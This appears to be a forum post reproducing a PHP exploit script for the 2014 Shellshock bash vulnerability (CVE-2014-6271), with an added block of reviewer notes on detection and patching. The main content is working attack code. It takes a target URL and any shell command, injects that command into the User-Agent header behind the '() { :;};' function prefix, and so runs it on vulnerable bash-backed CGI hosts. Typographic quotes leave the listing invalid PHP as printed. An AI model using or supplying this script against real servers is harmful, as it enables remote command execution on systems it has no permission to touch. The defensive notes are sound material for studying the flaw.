 
 
发表于 2014-9-25 20:50:55
 
 
 
 
     
 
    <?php   
    /*   
    CVE: 2014-6271   
    Vendor Homepage: https://www.gnu.org/software/bash/   
    Author: Prakhar Prasad && Subho Halder   
    Author Homepage: https://prakharprasad.com && https://appknox.com   
    Date: September 25th 2014   
    Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26   
    GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)   
    Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd   
    Test CGI Code : #!/bin/bash   
    echo “Content-type: text/html”   
    echo “”   
    echo “Bash-is-Vulnerable”   

    Reviewer notes (defensive context):
    - What is being tested: CVE-2014-6271 ("Shellshock"). Affected bash builds
      execute text that trails a function definition in an environment
      variable's value. A CGI handler receives request headers as environment
      variables, so a bash-backed CGI script is exposed to the User-Agent value.
    - What this script does: sends a single GET request whose User-Agent header
      carries such a value, then prints a status message. The response body is
      never read, so no command output is returned to the caller.
    - Detection: look in web access logs, WAF and IDS data for request header
      values that begin with "() {"; the test below treats an HTTP 500 status
      line as its success signal, so such a header paired with a 500 is worth
      triage.
    - Mitigation: update bash to a fully patched vendor package (the first fix
      was followed by further patches) and avoid shell-backed CGI handlers on
      exposed hosts.
    - NOTE(review): the typographic quote characters in this listing look like a
      page-rendering artifact; as printed, the file is not valid PHP.
    */    
    // Turn off all PHP error reporting for the rest of the script.
    error_reporting( 0 );   
    // STDIN is only defined by the command-line SAPI; bail out anywhere else.
    if (!defined(‘STDIN’)) die( “Please run it through command-line!\n” );   
    // -u <url> and -c <cmd>, both with a required value.
    $x = getopt( “u:c:” );   
    if (!isset($x['u']) || !isset($x['c']))   
    {   
    die( “Usage: “ .$_SERVER['PHP_SELF']. ” -u URL -c cmd\n” );   
    }   
    // Both values are used exactly as given on the command line; neither is
    // validated or escaped before use below.
    $url = $x['u'];   
    $cmd = $x['c'];   
    // HTTP stream context: method and one raw header string for the request.
    $context = stream_context_create(   
    array(   
    ‘http’ => array(   
    ‘method’ => ‘GET’,   
    // $cmd is concatenated straight into the header value.
    ‘header’ => ‘User-Agent: () { :;}; /bin/bash -c  “‘.$cmd.’” ‘   
    )   
    )   
    );   
       
    // "Command sent" is printed only when the fetch result is falsy AND the
    // first response header line contains "500" at an offset greater than 0.
    // Every other outcome, including a normal successful response, prints
    // "Connection Error".
    // NOTE(review): presumably the 500 comes from the CGI failing to emit valid
    // headers once bash has processed the header value -- confirm.
    if (!file_get_contents($url,  false , $context) && strpos($http_response_header[ 0 ], “500″ ) >  0 )   
    die( “Command sent to the server!\n” );   
    else    
    die( “Connection Error\n” );   
    ?>   
 